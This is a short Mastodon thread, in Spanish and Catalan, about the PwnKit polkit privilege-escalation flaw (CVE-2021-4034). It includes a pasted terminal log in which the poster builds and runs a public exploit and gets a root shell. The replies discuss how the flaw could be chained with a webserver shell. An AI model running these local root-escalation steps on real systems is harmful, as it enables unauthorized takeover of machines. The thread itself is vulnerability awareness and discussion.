Follow

Existe una vulnerabilidad en GNU/Linux donde algunas distros se han visto afectadas: blog.qualys.com/vulnerabilitie

Aquí ejecutando el exploit:

t3rr0r@z0n3:~$ cd CVE-2021-4034-main/
t3rr0r@z0n3:~/CVE-2021-4034-main$ make
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
cc -Wall cve-2021-4034.c -o cve-2021-4034
echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
mkdir -p GCONV_PATH=.
cp /usr/bin/true GCONV_PATH=./pwnkit.so:.
t3rr0r@z0n3:~/CVE-2021-4034-main$ ./cve-2021-4034
# whoami
root

· · Web · 2 · 6 · 5

Evidentemente, hay que tener acceso al servidor. No se puede ejecutar de forma remota pero si se tiene acceso a un usuario normal, se puede acceder a permisos de root.

@t3rr0rz0n3 el peligro es que combinado con otra vulnerabilidad por ejemplo de un webserver que te de una shell ya tienes el trabajo hecho

@k4y53r si un servidor tiene tantas vulnerabilidades, igual es que está abandonado.

@t3rr0rz0n3 pocas serian si son solo dos visto lo que hay por ahi suelto en PRO....

@t3rr0rz0n3 diria que totes les distribucions perquè fins i tot la meva Raspberry ho estava

Sign in to participate in the conversation
Xarxa Cloud

Otro nodo más de Mastodon con el objetivo de agrupar colectivos sociales.

No guardamos tus datos. No guardamos logs.